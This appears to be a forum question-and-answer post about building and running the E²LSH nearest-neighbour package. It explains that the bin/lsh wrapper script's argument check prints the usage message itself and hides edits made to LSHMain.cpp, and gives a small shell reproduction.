g++ -o $OUT_DIR/LSHMain $OPTIONS $OBJ_SOURCES $SOURCES_DIR/LSHMain.cpp -lm
chmod g+rwx $OUT_DIR/LSHMain
for i in $TEST_BUILDS; do
g++ -o ${OUT_DIR}/$i $OPTIONS ${SOURCES_DIR}/${i}.cpp $OBJ_SOURCES -lm; chmod g+rwx $OUT_DIR/${i};
done
the lsh script
#!/bin/bash
dir=bin
if [ $# -le 2 ]; then
echo Usage: $0 radius data_set_file query_set_file "[successProbability]"
exit
fi
paramsFile=$2.params
if [ $# -ge 4 ]; then
# success probability supplied
$dir/lsh_computeParams $1 "$2" "$3" $4 > "$paramsFile" || exit 1
else
# success probability not supplied
$dir/lsh_computeParams $1 "$2" "$3" > "$paramsFile" || exit 1
fi
chmod g+rw "$paramsFile"
echo "R*******" >/dev/stderr
echo "R*********************" >/dev/stderr
echo "R-NN DS params computed." >/dev/stderr
echo "R*********************" >/dev/stderr
echo "R*******" >/dev/stderr
$dir/lsh_fromParams "$2" "$3" "$paramsFile"
EDIT_1
When I run make I get:
bin/compile
sources/LocalitySensitiveHashing.cpp: In function ‘RNNParametersT readRNNParameters(FILE*)’:
sources/LocalitySensitiveHashing.cpp:62:22: warning: ignoring return value of ‘int fscanf(FILE*, const char*, ...)’, declared with attribute warn_unused_result [-Wunused-result]
(many many warnings, but no errors, I have checked that I can execute the program afterwards)
With make c I got:
g++ -o bin/LSHMain -O3 -DREAL_FLOAT -DDEBUG sources/BucketHashing.cpp sources/Geometry.cpp sources/LocalitySensitiveHashing.cpp sources/Random.cpp sources/Util.cpp sources/GlobalVars.cpp sources/SelfTuning.cpp sources/NearNeighbors.cpp sources/LSHMain.cpp -lm
warnings
chmod g+rwx bin/LSHMain
I really don't get why this didn't work....
With make compile I got:
g++ -o bin/LSHMain -O3 -DREAL_FLOAT -DDEBUG sources/BucketHashing.cpp sources/Geometry.cpp sources/LocalitySensitiveHashing.cpp sources/Random.cpp sources/Util.cpp sources/GlobalVars.cpp sources/SelfTuning.cpp sources/NearNeighbors.cpp sources/LSHMain.cpp -lm
warnings
chmod g+rwx bin/LSHMain
EDIT_2
The lsh_computeParams script is this:
#!/bin/bash
successProbability=0.9
if [ $# -le 1 ]; then
echo Usage: $0 radius data_set_file "{query_set_file | .} [successProbability]"
exit
fi
if [ $# -ge 4 ]; then
# success probability supplied
successProbability=$4
fi
arch=`uname`
nDataSet=` wc -l "$2"`
for x in $nDataSet; do nDataSet=$x; break; done
if [ "$3" != "." ]; then
nQuerySet=` wc -l "$3"`
for x in $nQuerySet; do nQuerySet=$x; break; done
else
nQuerySet=0
fi
dimension=`head -1 "$2" | wc -w`
#echo $nDataSet $nQuerySet $dimension
if [ -e bin/mem ]; then
m=`cat bin/mem`;
elif [ "$arch" = "Darwin" ]
then
#http://discussions.apple.com/thread.jspa?threadID=1608380&tstart=0
m=`top -l 1 | grep PhysMem | awk -F "[M,]" ' {print$10 }'`
let m=m*1024*1024
echo $m > bin/mem
else
s=`free -m | grep "Mem:"`
for i in $s; do m=$i; if [ "$i" != "Mem:" ]; then break; fi; done
m=${m}000000
echo $m > bin/mem
fi
bin/LSHMain $nDataSet $nQuerySet $dimension $successProbability "$1" "$2" "$3" $m -c
I had modified the file as such:
int main(int nargs, char **args){
printf("uoo\n");return 0;
if(nargs < 9){
usage(args[0]);
exit(1);
}
...
}
When E²LSH doesn't receive the correct arguments, it won't run its LSHMain (despite the fact that there is code for that case in the file, which is what tricked me so badly, because I thought I was reaching that point inside main()).
There is a script in the bin folder which takes over and prints the very same message that usage() would print; that's why I thought I was reaching that call. The usage() call lies inside if (nargs < 9), which is why I deliberately passed too few arguments: I wanted to be sure execution would fall inside that if and not run the algorithm (which takes time).
In short:
To reach the point where the code in source/LSHMain.cpp is executed, you must pass the correct arguments to bin/lsh. If you don't, only the bin/lsh script runs, which shadows any modifications made in source/LSHMain.cpp.
I hope this answer helps future users avoid the same trap. Special thanks to Etan Reisner, who helped me and eventually got me to think of deleting source/LSHMain.cpp, which is how I figured out what was happening.
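The trap is easy to reproduce with a toy wrapper, which is essentially what bin/lsh is doing here: the wrapper validates the argument count and prints the usage message itself, so the (modified) binary behind it never runs. File names below are made up for the illustration:

```shell
# A stand-in for the modified LSHMain binary
cat > main.sh <<'EOF'
#!/bin/sh
echo "uoo"   # the modification you expect to see
EOF
chmod +x main.sh

# A stand-in for bin/lsh: it checks arguments BEFORE calling the binary
cat > wrapper.sh <<'EOF'
#!/bin/sh
if [ $# -le 2 ]; then
    echo "Usage: $0 radius data_set_file query_set_file"
    exit 1
fi
./main.sh "$@"
EOF
chmod +x wrapper.sh

./wrapper.sh                 # prints only the usage line; main.sh never runs
./wrapper.sh 0.6 data query  # now main.sh runs and prints "uoo"
```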